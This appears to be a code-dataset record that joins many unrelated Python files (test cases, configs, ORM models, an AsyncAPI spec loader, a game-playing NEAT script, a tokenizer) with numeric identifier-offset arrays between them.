self.disp.draw_rows(tmp_slice, self.row)
self.last_slice = tmp_slice
else:
self.disp.draw_rows(self.last_slice, self.row)
self.last_row = self.row
def next(self):
if self.pointer + 1 <= len(self.items) - 1:
self.pointer += 1
if self.row < 2:
self.row += 1
self.draw()
def prev(self):
if self.pointer - 1 >= 0:
self.pointer -= 1
if self.row > 0:
self.row -= 1
self.draw()
def exec_item(self):
print("Item selcted", str(self.pointer))
| [
[
[
16,
21
],
[
259,
264
]
],
[
[
38,
47
],
[
311,
320
]
],
[
[
64,
73
],
[
358,
367
]
],
[
[
99,
112
],
[
1888,
1901
]
],
[
[
120,
127
],
[
1575,
1582
]
],
[
[
1366,
1370
]
]
] |
from tests.analyzer.utils import UnusedTestCase
from unimport.statement import Import, ImportFrom
class AsImportTestCase(UnusedTestCase):
def test_as_import_all_unused_all_cases(self):
self.assertSourceAfterScanningEqualToExpected(
"""\
from x import y as z
import x
from t import s as ss
from f import a as c, l as k, i as ii
from fo import (bar, i, x as z)
import le as x
""",
[
ImportFrom(
lineno=1,
column=1,
name="z",
package="x",
star=False,
suggestions=[],
),
Import(
lineno=2,
column=1,
name="x",
package="x",
),
ImportFrom(
lineno=3,
column=1,
name="ss",
package="t",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="c",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=2,
name="k",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=3,
name="ii",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=1,
name="bar",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=2,
name="i",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=3,
name="z",
package="fo",
star=False,
suggestions=[],
),
Import(
lineno=6,
column=1,
name="x",
package="le",
),
],
)
def test_as_import_one_used_in_function_all_cases(self):
self.assertSourceAfterScanningEqualToExpected(
"""\
from x import y as z
import x
from t import s as ss
from f import a as c, l as k, i as ii
from fo import (bar, i, x as z)
import le as x
def x(t=x):pass
""",
[
ImportFrom(
lineno=1,
column=1,
name="z",
package="x",
star=False,
suggestions=[],
),
Import(
lineno=2,
column=1,
name="x",
package="x",
),
ImportFrom(
lineno=3,
column=1,
name="ss",
package="t",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="c",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=2,
name="k",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=3,
name="ii",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=1,
name="bar",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=2,
name="i",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=3,
name="z",
package="fo",
star=False,
suggestions=[],
),
],
)
| [
[
[
33,
47
],
[
123,
137
]
],
[
[
79,
85
],
[
757,
763
],
[
2596,
2602
],
[
3428,
3434
]
],
[
[
87,
97
],
[
519,
529
],
[
923,
933
],
[
1162,
1172
],
[
1400,
1410
],
[
1638,
1648
],
[
1877,
1887
],
[
2118,
2128
],
[
2357,
2367
],
[
3190,
3200
],
[
3594,
3604
],
[
3833,
3843
],
[
4071,
4081
],
[
4309,
4319
],
[
4548,
4558
],
[
4789,
4799
],
[
5028,
5038
]
],
[
[
106,
122
]
]
] |
import os
from .takeout_sqlite3 import SQLite3
import multiprocessing
CONTACTS = 'Contacts' + os.sep + 'All Contacts' + os.sep + 'All Contacts.vcf'
DRIVE = 'Drive'
MY_ACTIVITY_ASSISTANT_PATH = 'My Activity' + os.sep + 'Assistant' + os.sep + 'MyActivity.html'
MY_ACTIVITY_GMAIL_PATH = 'My Activity' + os.sep + 'Gmail' + os.sep + 'MyActivity.html'
MY_ACTIVITY_GOOGLE_ANALYTICS_PATH = 'My Activity' + os.sep + 'Google Analytics' + os.sep + 'MyActivity.html'
MY_ACTIVITY_YOUTUBE_PATH = 'My Activity' + os.sep + 'YouTube' + os.sep + 'MyActivity.html'
MY_ACTIVITY_VIDEO_SEARCH_PATH = 'My Activity' + os.sep + 'Video Search' + os.sep + 'MyActivity.html'
MY_ACTIVITY_VOICE_AUDIO_PATH = 'My Activity' + os.sep + 'Voice and Audio' + os.sep + 'MyActivity.html'
MY_ACTIVITY_MAPS_PATH = 'My Activity' + os.sep + 'Maps' + os.sep + 'MyActivity.html'
MY_ACTIVITY_ANDROID_PATH = 'My Activity' + os.sep + 'Android' + os.sep + 'MyActivity.html'
MY_ACTIVITY_CHROME_PATH = 'My Activity' + os.sep + 'Chrome' + os.sep + 'MyActivity.html'
class Case(object):
def __init__(self, input_dir):
self.number_of_system_processes = 1
self.number_of_input_processes = 1
self.input_dir_path = input_dir
self.set_file_path()
def set_file_path(self):
if self.input_dir_path[-1] == os.sep:
self.input_dir_path = self.input_dir_path[:-1]
self.takeout_path = self.input_dir_path + os.sep + 'Takeout'
if not os.path.exists(self.takeout_path):
return False
self.takeout_contacts_path = self.takeout_path + os.sep + CONTACTS
self.takeout_drive_path = self.takeout_path + os.sep + DRIVE
self.takeout_my_activity_assistant_path = self.takeout_path + os.sep + MY_ACTIVITY_ASSISTANT_PATH
self.takeout_my_activity_gmail_path = self.takeout_path + os.sep + MY_ACTIVITY_GMAIL_PATH
self.takeout_my_activity_google_analytics_path = self.takeout_path + os.sep + MY_ACTIVITY_GOOGLE_ANALYTICS_PATH
self.takeout_my_activity_youtube_path = self.takeout_path + os.sep + MY_ACTIVITY_YOUTUBE_PATH
self.takeout_my_activity_video_search_path = self.takeout_path + os.sep + MY_ACTIVITY_VIDEO_SEARCH_PATH
self.takeout_my_activity_voice_audio_path = self.takeout_path + os.sep + MY_ACTIVITY_VOICE_AUDIO_PATH
self.takeout_my_activity_maps_path = self.takeout_path + os.sep + MY_ACTIVITY_MAPS_PATH
self.takeout_my_activity_android_path = self.takeout_path + os.sep + MY_ACTIVITY_ANDROID_PATH
self.takeout_my_activity_chrome_path = self.takeout_path + os.sep + MY_ACTIVITY_CHROME_PATH
| [
[
[
7,
9
],
[
95,
97
],
[
121,
123
],
[
211,
213
],
[
234,
236
],
[
302,
304
],
[
321,
323
],
[
400,
402
],
[
430,
432
],
[
500,
502
],
[
521,
523
],
[
596,
598
],
[
622,
624
],
[
696,
698
],
[
725,
727
],
[
792,
794
],
[
810,
812
],
[
880,
882
],
[
901,
903
],
[
970,
972
],
[
990,
992
],
[
1263,
1265
],
[
1366,
1368
],
[
1394,
1396
],
[
1497,
1499
],
[
1563,
1565
],
[
1642,
1644
],
[
1738,
1740
],
[
1841,
1843
],
[
1946,
1948
],
[
2047,
2049
],
[
2152,
2154
],
[
2249,
2251
],
[
2342,
2344
],
[
2437,
2439
]
],
[
[
39,
46
]
],
[
[
54,
69
]
],
[
[
71,
79
],
[
1506,
1514
]
],
[
[
149,
154
],
[
1572,
1577
]
],
[
[
166,
192
],
[
1651,
1677
]
],
[
[
261,
283
],
[
1747,
1769
]
],
[
[
348,
381
],
[
1850,
1883
]
],
[
[
457,
481
],
[
1955,
1979
]
],
[
[
548,
577
],
[
2056,
2085
]
],
[
[
649,
677
],
[
2161,
2189
]
],
[
[
752,
773
],
[
2258,
2279
]
],
[
[
837,
861
],
[
2351,
2375
]
],
[
[
928,
951
],
[
2446,
2469
]
],
[
[
1025,
1029
]
]
] |
from __future__ import print_function
import os
import pickle
import time
from gym_puyopuyo import register
import gym
import numpy as np
import neat
import visualize
piece_shape = (3, 2)
DRAW_NETS = False
NUM_COLORS = 3.0 # 3 colors in the small env mode
# TODO: could probably read color number from observation data
fn_results = "feedforward-small"
def multiplyMatrices(pieces, field, norm = True):
pieces = pieces.astype(np.float64)
field = field.astype(np.float64)
pieces_sum = np.zeros(piece_shape)
field_sum = np.zeros(field[0].shape)
for i in range(0, len(pieces)):
pieces[i] = np.multiply(pieces[i], i + 1)
if(norm):
pieces[i] /= NUM_COLORS
pieces_sum += pieces[i]
for i in range(0, len(field)):
field[i] = np.multiply(field[i], i + 1)
if(norm):
field[i] /= NUM_COLORS
field_sum += field[i]
return pieces_sum, field_sum
def run():
with open("results/winner-pickle-"+fn_results, 'rb') as f:
c = pickle.load(f)
print('loaded genome:')
print(c)
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'config-feedforward-small')
config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_path)
net = neat.nn.FeedForwardNetwork.create(c, config)
register()
env = gym.make("PuyoPuyoEndlessSmall-v2")
done = False
ob = env.reset()
count = 0
total_reward = 0
while True:
env.render()
#input()
time.sleep(0.5)
pieces_sum, field_sum = multiplyMatrices(ob[0], ob[1])
next_piece = pieces_sum[0]
inp_piece = np.ndarray.flatten(next_piece)
inp_field = np.ndarray.flatten(field_sum)
inputs = np.hstack([inp_piece, inp_field])
nn_output = net.activate(inputs)
action = np.argmax(nn_output)
#print(nn_output)
#nn_output = int(round(nn_output[0] * NUM_ACTIONS))
#print(nn_output)
#input()
ob, rew, done, info = env.step(action)
total_reward += rew
count += 1
if done:
break
print("Game played for ", count, " turns.")
print("Total score: ", total_reward)
if DRAW_NETS:
visualize.draw_net(config, c, view=True,
filename="results/winner-"+fn_results+".net")
visualize.draw_net(config, c, view=True,
filename="results/winner-"+fn_results+"-enabled.net",
show_disabled=False)
visualize.draw_net(config, c, view=True,
filename="results/winner-"+fn_results+"-pruned.net",
show_disabled=False, prune_unused=True)
if __name__ == '__main__':
run()
| [
[
[
23,
37
]
],
[
[
46,
48
],
[
1108,
1110
],
[
1152,
1154
]
],
[
[
56,
62
],
[
1026,
1032
]
],
[
[
70,
74
],
[
1637,
1641
]
],
[
[
101,
109
],
[
1444,
1452
]
],
[
[
117,
120
],
[
1465,
1468
]
],
[
[
128,
139
],
[
434,
436
],
[
471,
473
],
[
500,
502
],
[
538,
540
],
[
619,
621
],
[
789,
791
],
[
1784,
1786
],
[
1835,
1837
],
[
1882,
1884
],
[
1983,
1985
]
],
[
[
148,
152
],
[
1217,
1221
],
[
1229,
1233
],
[
1249,
1253
],
[
1299,
1303
],
[
1323,
1327
],
[
1395,
1399
]
],
[
[
160,
169
],
[
2406,
2415
],
[
2535,
2544
],
[
2717,
2726
]
],
[
[
171,
182
],
[
509,
520
]
],
[
[
192,
201
],
[
2387,
2396
]
],
[
[
210,
220
],
[
692,
702
],
[
860,
870
]
],
[
[
323,
333
],
[
990,
1000
],
[
2499,
2509
],
[
2628,
2638
],
[
2810,
2820
]
],
[
[
361,
377
],
[
1685,
1701
]
],
[
[
944,
947
],
[
2932,
2935
]
]
] |
import uuid
from app import db
from app.dao.dao_utils import transactional
from app.models import (
BroadcastMessage,
BroadcastEvent,
BroadcastProvider,
BroadcastProviderMessage,
BroadcastProviderMessageNumber,
BroadcastProviderMessageStatus
)
def dao_get_broadcast_message_by_id_and_service_id(broadcast_message_id, service_id):
return BroadcastMessage.query.filter(
BroadcastMessage.id == broadcast_message_id,
BroadcastMessage.service_id == service_id
).one()
def dao_get_broadcast_event_by_id(broadcast_event_id):
return BroadcastEvent.query.filter(BroadcastEvent.id == broadcast_event_id).one()
def dao_get_broadcast_messages_for_service(service_id):
return BroadcastMessage.query.filter(
BroadcastMessage.service_id == service_id
).order_by(BroadcastMessage.created_at)
def get_earlier_events_for_broadcast_event(broadcast_event_id):
"""
This is used to build up the references list.
"""
this_event = BroadcastEvent.query.get(broadcast_event_id)
return BroadcastEvent.query.filter(
BroadcastEvent.broadcast_message_id == this_event.broadcast_message_id,
BroadcastEvent.sent_at < this_event.sent_at
).order_by(
BroadcastEvent.sent_at.asc()
).all()
@transactional
def create_broadcast_provider_message(broadcast_event, provider):
broadcast_provider_message_id = uuid.uuid4()
provider_message = BroadcastProviderMessage(
id=broadcast_provider_message_id,
broadcast_event=broadcast_event,
provider=provider,
status=BroadcastProviderMessageStatus.SENDING,
)
db.session.add(provider_message)
db.session.commit()
provider_message_number = None
if provider == BroadcastProvider.VODAFONE:
provider_message_number = BroadcastProviderMessageNumber(
broadcast_provider_message_id=broadcast_provider_message_id)
db.session.add(provider_message_number)
db.session.commit()
return provider_message
| [
[
[
7,
11
],
[
1402,
1406
]
],
[
[
29,
31
],
[
1639,
1641
],
[
1676,
1678
],
[
1925,
1927
],
[
1973,
1975
]
],
[
[
62,
75
],
[
1286,
1299
]
],
[
[
105,
121
],
[
368,
384
],
[
407,
423
],
[
460,
476
],
[
726,
742
],
[
765,
781
],
[
822,
838
]
],
[
[
127,
141
],
[
582,
596
],
[
610,
624
],
[
1000,
1014
],
[
1057,
1071
],
[
1094,
1108
],
[
1174,
1188
],
[
1242,
1256
]
],
[
[
147,
164
],
[
1750,
1767
]
],
[
[
170,
194
],
[
1438,
1462
]
],
[
[
200,
230
],
[
1812,
1842
]
],
[
[
236,
266
],
[
1589,
1619
]
],
[
[
275,
321
]
],
[
[
520,
549
]
],
[
[
663,
701
]
],
[
[
857,
895
]
],
[
[
1304,
1337
]
]
] |
# ----------------------------------------------------------------------------
# - Open3D: www.open3d.org -
# ----------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2020 www.open3d.org
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
"""
3D ML pipelines for PyTorch.
"""
import os as _os
from open3d import _build_config
if _build_config['BUNDLE_OPEN3D_ML']:
if 'OPEN3D_ML_ROOT' in _os.environ:
from ml3d.torch.pipelines import *
else:
from open3d._ml3d.torch.pipelines import *
| [
[
[
1480,
1489
],
[
1589,
1592
]
],
[
[
1509,
1522
],
[
1527,
1540
]
],
[
[
1643,
1644
]
],
[
[
1704,
1705
]
]
] |
import os
def to_bool(value):
return (
value is True or
(isinstance(value, str) and value.lower() in ['true', 'yes']) or
(isinstance(value, (int, float)) and value > 0)
)
bind = '0.0.0.0:{}'.format(os.getenv('GUNICORN_PORT', '8000'))
max_requests = int(os.getenv('GUNICORN_MAX_REQUESTS', '10000'))
max_requests_jitter = int(os.getenv('GUNICORN_MAX_REQUESTS_JITTER', '100'))
user = os.getenv('GUNICORN_USER', 'root')
keepalive = int(os.getenv('GUNICORN_KEEPALIVE', '70'))
reuse_port = to_bool(os.getenv('GUNICORN_REUSE_PORT', True))
accesslog = '-'
errorlog = '-'
print_config = True
workers = int(os.getenv('GUNICORN_WORKERS', '5'))
threads = int(os.getenv('GUNICORN_THREADS', '5'))
| [
[
[
7,
9
],
[
234,
236
],
[
289,
291
],
[
360,
362
],
[
417,
419
],
[
468,
470
],
[
529,
531
],
[
636,
638
],
[
686,
688
]
],
[
[
16,
23
],
[
521,
528
]
],
[
[
207,
211
]
],
[
[
270,
282
]
],
[
[
334,
353
]
],
[
[
410,
414
]
],
[
[
452,
461
]
],
[
[
508,
518
]
],
[
[
570,
579
]
],
[
[
586,
594
]
],
[
[
601,
613
]
],
[
[
622,
629
]
],
[
[
672,
679
]
]
] |
import pytest
from skidl import *
from .setup_teardown import *
def test_pin_names_1():
codec = Part("xess.lib", "ak4520a")
assert codec["ain"] == codec.n["ain"]
assert codec[1:4] == codec.p[1:4]
def test_pin_names_2():
codec = Part("xess.lib", "ak4520a")
codec[4].name = "A1"
codec[8].name = "A2"
codec[8].num = "A1"
assert codec[4] is codec.n["A1"]
assert codec.p[4] is codec.n["A1"]
assert codec[4] is codec.p[4]
assert codec.p["A1"] is codec.n["A2"]
assert codec["A1"] is codec.n["A2"]
assert codec["A1"] is codec.p["A1"]
| [
[
[
7,
13
]
],
[
[
33,
34
]
],
[
[
64,
65
],
[
104,
108
],
[
250,
254
]
],
[
[
72,
88
]
],
[
[
218,
234
]
]
] |
from dataclasses import dataclass
from dataclasses import field
from typing import Any
from typing import Callable
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Type
from svarog import forge
from svarog import register_forge
from svarog.types import Forge
JSONMappingValue = Any
JSONMapping = Mapping[str, JSONMappingValue]
JSONSchema = JSONMapping
GLOBAL_NAMESPACE = "/"
@dataclass
class MessageAck:
"""The specification of a message acknowledgement"""
args: JSONSchema
@dataclass
class Message:
"""
https://www.asyncapi.com/docs/specifications/2.0.0#messageObject
The above message object is extended as follows:
* `x-handler`: Allows the coupling of the message specification to
an event handler (which is a python callable). It SHOULD only be used
for messages under a `publish` operation. Deserialized to `x_handler`.
* `x-ack`: The specification of the acknowledgement packet that the message receiver
transmits to the message sender. The acknowledgement args are passed as an input
to the callback of the `emit`/`send` function. Deserialized to `x_ack`.
    The extensions are implemented as per:
https://www.asyncapi.com/docs/specifications/2.0.0#specificationExtensions
"""
name: str
payload: Optional[JSONSchema] = None
x_handler: Optional[str] = None
x_ack: Optional[MessageAck] = None
@staticmethod
def forge(type_: Type["Message"], data: JSONMapping, forge: Forge) -> "Message":
return type_(
name=forge(type_.__annotations__["name"], data["name"]),
payload=forge(type_.__annotations__["payload"], data.get("payload")),
x_handler=forge(type_.__annotations__["x_handler"], data.get("x-handler")),
x_ack=forge(type_.__annotations__["x_ack"], data.get("x-ack")),
)
register_forge(Message, Message.forge)
@dataclass
class OneOfMessages:
"""Using `oneOf` to specify multiple messages per operation"""
oneOf: Sequence[Message]
@staticmethod
def forge(
type_: Type["OneOfMessages"], data: JSONMapping, forge: Forge
) -> "OneOfMessages":
if "oneOf" in data:
return type_(
oneOf=forge(type_.__annotations__["oneOf"], data["oneOf"]),
)
return type_(oneOf=[forge(Message, data)])
def with_name(self, name: str) -> Optional[Message]:
for message in self.oneOf:
if message.name == name:
return message
return None
register_forge(OneOfMessages, OneOfMessages.forge)
@dataclass
class Operation:
"""https://www.asyncapi.com/docs/specifications/2.0.0#operationObject"""
message: OneOfMessages
@dataclass
class WebSocketsChannelBindings:
"""
https://github.com/asyncapi/bindings/tree/master/websockets#channel-binding-object
"""
method: Optional[str] = None
query: Optional[JSONSchema] = None
headers: Optional[JSONSchema] = None # TODO: Convert header properties to lowercase
bindingVersion: str = "latest"
@dataclass
class ChannelBindings:
"""https://www.asyncapi.com/docs/specifications/2.0.0#channelBindingsObject"""
ws: WebSocketsChannelBindings
@dataclass
class ChannelHandlers:
connect: Optional[str] = None
disconnect: Optional[str] = None
error: Optional[str] = None
@dataclass
class Channel:
"""
https://www.asyncapi.com/docs/specifications/2.0.0#channelItemObject
The above channel item object is extended to
support default namespace handlers as per:
https://www.asyncapi.com/docs/specifications/2.0.0#specificationExtensions
The `x_handlers` field is serialized as `x-handlers`.
"""
subscribe: Optional[Operation] = None
publish: Optional[Operation] = None
bindings: Optional[ChannelBindings] = None
x_handlers: Optional[ChannelHandlers] = None
def __post_init__(self):
if self.publish is not None:
for message in self.publish.message.oneOf:
if message.x_handler is None:
raise ValueError(
f"Message {message.name} is missing the x-handler attribute.\n"
"Every message under a publish operation "
"should have a handler defined."
)
@staticmethod
def forge(type_: Type["Channel"], data: JSONMapping, forge: Forge) -> "Channel":
return type_(
subscribe=forge(type_.__annotations__["subscribe"], data.get("subscribe")),
publish=forge(type_.__annotations__["publish"], data.get("publish")),
bindings=forge(type_.__annotations__["bindings"], data.get("bindings")),
x_handlers=forge(
type_.__annotations__["x_handlers"], data.get("x-handlers")
),
)
register_forge(Channel, Channel.forge)
@dataclass
class Server:
"""https://www.asyncapi.com/docs/specifications/2.0.0#serverObject"""
url: str
@dataclass
class AsyncApiSpec:
"""https://www.asyncapi.com/docs/specifications/2.0.0#A2SObject"""
channels: Mapping[str, Channel]
servers: Mapping[str, Server] = field(default_factory=dict)
@staticmethod
def from_dict(data: JSONMapping) -> "AsyncApiSpec":
return forge(AsyncApiSpec, data)
ErrorHandler = Callable[[Exception], None]
| [
[
[
24,
33
],
[
434,
443
],
[
544,
553
],
[
1927,
1936
],
[
2619,
2628
],
[
2754,
2763
],
[
3100,
3109
],
[
3254,
3263
],
[
3393,
3402
],
[
4917,
4926
],
[
5032,
5041
]
],
[
[
58,
63
],
[
5206,
5211
]
],
[
[
83,
86
],
[
333,
336
]
],
[
[
106,
114
],
[
5367,
5375
]
],
[
[
134,
141
],
[
351,
358
],
[
5148,
5155
],
[
5183,
5190
]
],
[
[
161,
169
],
[
1329,
1337
],
[
1372,
1380
],
[
1404,
1412
],
[
2913,
2921
],
[
2945,
2953
],
[
2986,
2994
],
[
3300,
3308
],
[
3337,
3345
],
[
3369,
3377
],
[
3758,
3766
],
[
3798,
3806
],
[
3839,
3847
],
[
3888,
3896
],
[
2420,
2428
]
],
[
[
189,
197
],
[
2037,
2045
]
],
[
[
217,
221
],
[
1472,
1476
],
[
2104,
2108
],
[
4401,
4405
]
],
[
[
242,
247
],
[
5324,
5329
]
],
[
[
267,
281
],
[
1885,
1899
],
[
2565,
2579
],
[
4875,
4889
]
],
[
[
307,
312
],
[
1515,
1520
],
[
2153,
2158
],
[
4444,
4449
]
],
[
[
314,
330
],
[
364,
380
]
],
[
[
337,
348
],
[
395,
406
],
[
1495,
1506
],
[
2133,
2144
],
[
4424,
4435
],
[
5277,
5288
]
],
[
[
382,
392
],
[
530,
540
],
[
1338,
1348
],
[
2954,
2964
],
[
2995,
3005
]
],
[
[
408,
424
]
],
[
[
450,
460
],
[
1413,
1423
]
],
[
[
560,
567
],
[
1900,
1907
],
[
1909,
1916
],
[
2046,
2053
],
[
2364,
2371
],
[
2429,
2436
]
],
[
[
1943,
1956
],
[
2580,
2593
],
[
2595,
2608
],
[
2737,
2750
]
],
[
[
2635,
2644
],
[
3767,
3776
],
[
3807,
3816
]
],
[
[
2770,
2795
],
[
3225,
3250
]
],
[
[
3116,
3131
],
[
3848,
3863
]
],
[
[
3270,
3285
],
[
3897,
3912
]
],
[
[
3409,
3416
],
[
4890,
4897
],
[
4899,
4906
],
[
5161,
5168
]
],
[
[
4933,
4939
],
[
5196,
5202
]
],
[
[
5048,
5060
],
[
5330,
5342
]
],
[
[
5352,
5364
]
]
] |
# -*- encoding: utf-8 -*-
# Module iaframe
from numpy import *
def iaframe(f, WT=1, HT=1, DT=0, k1=None, k2=None):
    from ia870 import iaunion, iaintersec, ialimits
if k1 is None: k1 = ialimits(f)[1]
if k2 is None: k2 = ialimits(f)[0]
assert len(f.shape)==2,'Supports 2D only'
y = iaintersec(f,k2)
y[:,0:WT] = k1
y[:,-WT:] = k1
y[0:HT,:] = k1
y[-HT:,:] = k1
return y
| [
[
[
62,
63
]
],
[
[
69,
76
]
]
] |
import jwt
from contextlib import contextmanager
from datetime import datetime, timedelta
from sqlalchemy import Column, Integer, String, DateTime, Boolean
from sqlalchemy import ForeignKey, func
from sqlalchemy.orm import relationship
from saraki.auth import _request_ctx_stack, User, Org
from saraki.model import BaseModel, Model, database
class DummyBaseModel(BaseModel):
__tablename__ = "dummy_base_model"
id = Column(Integer, primary_key=True)
class DummyModel(Model):
__tablename__ = "dummy_model"
id = Column(Integer, primary_key=True)
class Person(Model):
__tablename__ = "person"
id = Column(Integer, primary_key=True)
firstname = Column(String, nullable=False)
lastname = Column(String, nullable=False)
age = Column(Integer, nullable=False)
def export_data(self, include=("id", "firstname"), exclude=()):
return super(Person, self).export_data(include, exclude)
class Product(BaseModel):
__tablename__ = "product"
id = Column(Integer, primary_key=True)
name = Column(String(120), nullable=False)
color = Column(String, default="white")
price = Column(Integer, default=0)
created_at = Column(DateTime, nullable=False, default=func.now())
updated_at = Column(DateTime, nullable=False, server_default=func.now())
enabled = Column(Boolean, default=False)
class Order(BaseModel):
__tablename__ = "order"
id = Column(Integer, primary_key=True)
customer_id = Column(Integer, ForeignKey("person.id"), nullable=False)
lines = relationship("OrderLine")
customer = relationship("Person", uselist=False)
class OrderLine(Model):
__tablename__ = "order_line"
order_id = Column(Integer, ForeignKey("order.id"), nullable=False, primary_key=True)
product_id = Column(
Integer, ForeignKey("product.id"), nullable=False, primary_key=True
)
unit_price = Column(Integer, nullable=False)
quantity = Column(Integer, default=1, nullable=False)
product = relationship("Product", uselist=False)
def export_data(self, include=(), exclude=()):
include = tuple(include) + ("product_id", "unit_price", "quantity")
return super(OrderLine, self).export_data(include, exclude)
class Cartoon(Model):
__tablename__ = "cartoon"
id = Column(Integer, primary_key=True)
name = Column(String(80), unique=True, nullable=False)
nickname = Column(String(80), unique=True)
class Todo(Model):
__tablename__ = "todo"
id = Column(Integer, primary_key=True)
org_id = Column(Integer, ForeignKey("org.id"), nullable=False)
task = Column(String(200), nullable=False)
def login(username, orgname=None, scope=None):
iat = datetime.utcnow()
exp = iat + timedelta(seconds=6000)
payload = {"iss": "acme.local", "sub": username, "iat": iat, "exp": exp}
if orgname:
payload.update({"aud": orgname, "scp": {"org": ["manage"]}})
if scope:
payload.update({"scp": scope})
token = jwt.encode(payload, "secret").decode()
return f"JWT {token}"
@contextmanager
def auth_ctx(username, orgname=None):
_request_ctx_stack.top.current_user = User(id=1, username=username)
if orgname:
_request_ctx_stack.top.current_org = Org(id=1, orgname=orgname)
yield
def reset_secuence(table, column_name="id", schema_name="public"):
table_name = f"{schema_name}.{table.__tablename__}"
sql = f"SELECT pg_get_serial_sequence('{table_name}', '{column_name}');"
secuence_name = database.engine.execute(sql).fetchone()[0]
if secuence_name is not None:
sql = f"ALTER SEQUENCE {secuence_name} RESTART WITH 1;"
database.engine.execute(sql)
| [
[
[
7,
10
],
[
3015,
3018
]
],
[
[
34,
48
],
[
3084,
3098
]
],
[
[
70,
78
],
[
2727,
2735
]
],
[
[
80,
89
],
[
2761,
2770
]
],
[
[
114,
120
],
[
428,
434
],
[
533,
539
],
[
630,
636
],
[
681,
687
],
[
728,
734
],
[
770,
776
],
[
1005,
1011
],
[
1051,
1057
],
[
1100,
1106
],
[
1145,
1151
],
[
1190,
1196
],
[
1261,
1267
],
[
1336,
1342
],
[
1432,
1438
],
[
1485,
1491
],
[
1711,
1717
],
[
1803,
1809
],
[
1911,
1917
],
[
1959,
1965
],
[
2317,
2323
],
[
2363,
2369
],
[
2427,
2433
],
[
2518,
2524
],
[
2566,
2572
],
[
2632,
2638
]
],
[
[
122,
129
],
[
435,
442
],
[
540,
547
],
[
637,
644
],
[
777,
784
],
[
1012,
1019
],
[
1152,
1159
],
[
1439,
1446
],
[
1492,
1499
],
[
1718,
1725
],
[
1819,
1826
],
[
1918,
1925
],
[
1966,
1973
],
[
2324,
2331
],
[
2525,
2532
],
[
2573,
2580
]
],
[
[
131,
137
],
[
688,
694
],
[
735,
741
],
[
1058,
1064
],
[
1107,
1113
],
[
2370,
2376
],
[
2434,
2440
],
[
2639,
2645
]
],
[
[
139,
147
],
[
1197,
1205
],
[
1268,
1276
]
],
[
[
149,
156
],
[
1343,
1350
]
],
[
[
180,
190
],
[
1501,
1511
],
[
1727,
1737
],
[
1828,
1838
],
[
2582,
2592
]
],
[
[
192,
196
],
[
1231,
1235
],
[
1309,
1313
]
],
[
[
224,
236
],
[
1555,
1567
],
[
1597,
1609
],
[
2017,
2029
]
],
[
[
262,
280
],
[
3142,
3160
],
[
3235,
3253
]
],
[
[
282,
286
],
[
3180,
3184
]
],
[
[
288,
291
],
[
3272,
3275
]
],
[
[
317,
326
],
[
367,
376
],
[
952,
961
],
[
1381,
1390
]
],
[
[
328,
333
],
[
481,
486
],
[
582,
587
],
[
1653,
1658
],
[
2268,
2273
],
[
2472,
2477
]
],
[
[
335,
343
],
[
3534,
3542
],
[
3684,
3692
]
],
[
[
352,
366
]
],
[
[
470,
480
]
],
[
[
575,
581
],
[
892,
898
]
],
[
[
944,
951
]
],
[
[
1375,
1380
]
],
[
[
1643,
1652
],
[
2205,
2214
]
],
[
[
2260,
2267
]
],
[
[
2467,
2471
]
],
[
[
2674,
2679
]
],
[
[
3103,
3111
]
],
[
[
3316,
3330
]
]
] |
from multiprocessing import Pool
import argparse
import glob
import os
import io
import time
import logging
import gluonnlp as nlp
import tokenizer as tokenization
parser = argparse.ArgumentParser(description='BERT tokenizer')
parser.add_argument('--input_files', type=str, default='wiki_*.doc',
help='Input files. Default is "wiki_*.doc"')
parser.add_argument('--nworker', type=int, default=8,
help='Number of workers for parallel processing.')
args = parser.parse_args()
input_files = sorted(glob.glob(os.path.expanduser(args.input_files)))
num_files = len(input_files)
num_workers = args.nworker
logging.basicConfig(level=logging.INFO)
logging.info("Number of input files to process = %d"%(num_files))
# TODO(haibin) tokenize with vocab
exclude_patterns = [
'< no ##in ##cl ##ude >\n'
]
def in_pattern(x):
for pattern in exclude_patterns:
if len(x) == len(pattern) and x == pattern:
return True
return False
def f(input_file):
with io.open(input_file, 'r', encoding="utf-8") as fin:
        assert input_file.endswith('.tokens'), 'Expects .tokens suffix for input files'
with io.open(input_file.replace('.tokens', '.tks'), 'w', encoding="utf-8") as fout:
new_doc = True
with io.open(input_file, 'r', encoding="utf-8") as fin:
lines = fin.readlines()
for line in lines:
if new_doc:
new_doc = False
